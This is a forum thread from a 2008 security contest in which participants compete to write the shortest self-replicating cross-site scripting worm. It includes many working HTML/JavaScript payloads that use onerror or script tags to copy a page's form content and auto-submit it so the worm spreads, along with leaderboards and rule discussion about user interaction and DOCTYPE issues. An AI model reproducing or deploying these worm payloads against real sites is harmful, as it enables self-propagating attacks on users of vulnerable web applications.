this is for the.. "doctype" compilant variation:

<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

Ronald&everyone:
I'll update your payloads as soon as I return from breakfast.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

this is the latest count:


.- ma1 (129) [requires the user to focus a field]
.- Spyware (132) [requires the user to focus a field]
.- Spikeman (132) [requires the user to focus a field DOCTYPE ISSUES]
.- .mario (142) <form> (with doctype issues)
.- Ronald (143) <form> (with doctype issues)
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (160)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178)
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>
.- bwb labs 271 XHR

agreed?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 01/06/2008 12:32PM by sirdarckcat.

.mario and Ronald:
yours will grow

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

mine (164 chars):-

<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth, yours grows to:

<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">

and doesnt works on firefox

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 01/06/2008 11:08AM by sirdarckcat.

@SDC

what do you mean with grow? nothing grows, tested multiple times, the payload is exactly as it started, I even made sure the added quotes won't happen in FF.

I don't get it either - tested it with your judge2 and my script - no growth...

@SDC

List is certainly not agreed, and who put you in the place to keep track of this? did you tested those you declined? and if so, better explain what's up with them and not just ignore them.

Ok, sorry mario yours doesnt grow on firefox, but doesnt work on IE, my mistake

Ronald:
Yours grows to:
<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined

with an undefined at the end

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/06/2008 11:34AM by sirdarckcat.

@.mario:

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

confirmed on Apache 1.3.X and above.

Looks like this baby is one of the smallest so far :) awesome job .mario!

Ahhh okay, plausible.

here is the update: 143 chars, undefined fixed.

<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

Edited 1 time(s). Last edit at 01/06/2008 11:41AM by Ronald.

@Ronald: thx - but I meant this:

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>

This works on all my Apache2.2.x instances (unfortunately the ruless tell about A1.3.x/A2.x *g*)

@.mario

nope :( doesn't work on Apache 1.3.x

@sdc

Mine does work on FF I've tested it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

sirdarckcat Wrote:
-------------------------------------------------------
> this is the latest count:
>
>
> .- ma1 (129) [requires the user to focus a field]

My 128 modification to this worked in the tests (requiring user interaction: focus/blur).

> .- .mario (142) (with doctype issues)

I missed that one, well done!

<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>

142 (not sure if it's a duplicate, it's becoming difficult to follow)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1: Yeah .mario had that one already, only the _ was m

Ronald:
yours is 142 on IE and 144 on FF

I dunno which number to put on the count hehe, 143 is the score, but 144 is the highest..

This is the content on Firefox:

<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

and on IE:

<form id=_><INPUT name=content><SCRIPT>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</SCRIPT>

@ma1

yeah, mario had that allready

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/06/2008 12:28PM by sirdarckcat.

When the button name is NOT specified in the input tag (value="name for button"), does IE7 render the button name in the source?

Firefox doesn't do this, but IEtab does. Can someone help me out here?

Thanks,

EDIT,

If it doesn't render (I'm not sure yet), here you go, 141:

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>



Edited 1 time(s). Last edit at 01/06/2008 12:32PM by Spyware.

Gareth:
try yours here:
http://loteria-gratis.com.ar/judge2.php

It doesn't pass from count: 2

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/06/2008 12:31PM by sirdarckcat.

hehe my worm shrinks! LOL

Ok, afaik there are 4 2 possible scores:

Score in the case RSnake says that using user interaction is ok and the DOCTYPE is not an issue:

1.- ma1 (129)
2.- Spyware (132)
3.- Spikeman (132)
4.- .mario (142)
5.- Ronald (143)
6.- sirdarckcat (145)
7.- shawn (153)
8.- ritz (167)
9.- babarianbob (168)
10.- Gareth Heyes (229)
11.- Matt Presson (233)
12.- bwb labs (264)
13.- digi7al64 (266)

Score in the case RSnake says that using user interaction is ok and the DOCTYPE is an issue:

1.- ma1 (129)
2.- Spyware (132)
3.- sirdarckcat (160)
4.- ritz (167)
5.- babarianbob (168)
6.- .mario (178)
7.- Gareth Heyes (229)
8.- Matt Presson (233)
9.- bwb labs (264)
10.- digi7al64 (266)

Score in the case RSnake says user interaction is not allowed and DOCTYPE is not an issue:

1.- .mario (142)
2.- Ronald (143)
3.- sirdarckcat (145)
4.- shawn (153)
5.- ma1 (156)
6.- ritz (167)
7.- babarianbob (168)
8.- .mario (178)
9.- Gareth Heyes (229)
10.- Matt Presson (233)
11.- bwb labs (264)
12.- digi7al64 (266)

Score in the case RSnake says user interaction is not allowed, and doctype is an issue:

1.- sirdarckcat (160)
2.- ma1 (163)
3.- ritz (167)
4.- babarianbob (168)
5.- .mario (178)
6.- Gareth Heyes (229)
7.- Matt Presson (233)
8.- bwb labs (264)
9.- digi7al64 (266)

now.. lets hope that RSnake says user interaction is not allowed, and doctype is an issue :D

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 7 time(s). Last edit at 01/06/2008 01:35PM by sirdarckcat.

You know, there's a great difference between EVENTS and USER INTERACTION. OnError does it's thing automatically, same goes for OnLoad, and in some cases onChange.

What is not allowed, interaction or events?

Gareth:

your worm grows.. a lot on IE and Firefox, the delimiter is not working, I dunno why

*Interaction*

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/06/2008 01:06PM by sirdarckcat.

Quote
sirdarckcat
bwb labs (271)

My lastest XMLHttpRequest contribution was not the shortest one ...
See the first original version (193 bytes), and the second with the addition of the Content-Type (264 bytes).
Note that XMLHttpRequest versions might be the only versions that do not have looping problems ...

ok, yours is 264, sorry

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@oxotnick - assume the same directory for now, just to make it easy. That's a good question and wouldn't be the same in all cases, as you point out, but just for simplicity's sake and for ease of testing, let's assume they reside in the same directory.

A few people asked about the user interaction requirement - I'll append the rules for that question. In my mind, this is a best judgment call, rather than a real rule. If you're writing a worm you want it to propagate, not just to run in certain circumstances. So unless the worm works with user interaction like mousing over anywhere in the body tag of a page or something, I don't think we can really consider it a real worm. If someone has to type a novel into a form to get it to work, while technically that's a worm, it's not a particularly good one. So for the purpose of this contest let's just say that it should require no user interaction or user interaction that happens on every single page without the user thinking about it.

Also, about the "growing" limitation and request to rescind that rule. I completely understand why people have issue with that, but if we assume that the size of a worm is important, then we also have to assume the size of the worm continues to be important for propagation purposes. So for this context it stays, although I definitely think the other is worth mentioning if someone just feels like submitting something small that grows (as long as it doesn't exponentially grow) for the kick of it.

Also, I would say code that breaks with a DOCTYPE on the page is a problem as it's commonly included (including this site as a point of reference), and we should assume that all pages have a body tag since that's ubiquitously used.



Edited 1 time(s). Last edit at 01/06/2008 01:35PM by rsnake.

Ah just to solve some doubts.. and not repeating them to everyone on private:

1.- The scores are NOT OFFICIAL, I mean, I'm putting them because I wanted to know in which place I am, but they may be different from what RSnake says!, so, I repeat THEY ARE NOT OFFICIAL!!!!

2.- The JUDGES, are "NOT OFFICIAL", the result the judges make is just so you can test your codes!! and that's the way I'm making the scores, but I repeat they are also NOT OFFICIAL.. they are just to help us out..

3.- The difference between JUDGE1 and JUDGE2 is:
JUDGE1 has a DOCTYPE http://loteria-gratis.com.ar/judge1.php
JUDGE2 doesnt! http://loteria-gratis.com.ar/judge2.php

4.- The source code of judge1 and judge2 is here:
judge1: http://loteria-gratis.com.ar/judge1.php?sc
judge2: http://loteria-gratis.com.ar/judge2.php?sc

5.- If your code loops, you have to delete your session here:
http://loteria-gratis.com.ar/judge1.php?logout

6.- For the <form> style replication worms, the count should increase everytime the alert appears.

7.- For the XHR style replication worms, you have to manually reload the page to see if the Count is increasing.

8.- For the user-interaction event style replication worms, there's a button at the bottom of the page that says trigger events.. that should trigger your event automatically. rsnake says those are not valid, so.. forget it

that's all.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/06/2008 01:31PM by sirdarckcat.

Right, nothing is official until people submit them and say that's their final submission on the 10th. Anything before then I'm assuming is test code due to the sheer volume of revisions going on. I think it's really helpful to have running counts though, so people can see where things are. It'll also help people understand what's required to win at whatever point the chars are tallied. Thanks, Sirdarckcat!

- RSnake
Gotta love it. http://ha.ckers.org

Quote

RSnake; If someone has to type a novel into a form to get it to work, while technically that's a worm, it's not a particularly good one.

lol, this will be a classic ^^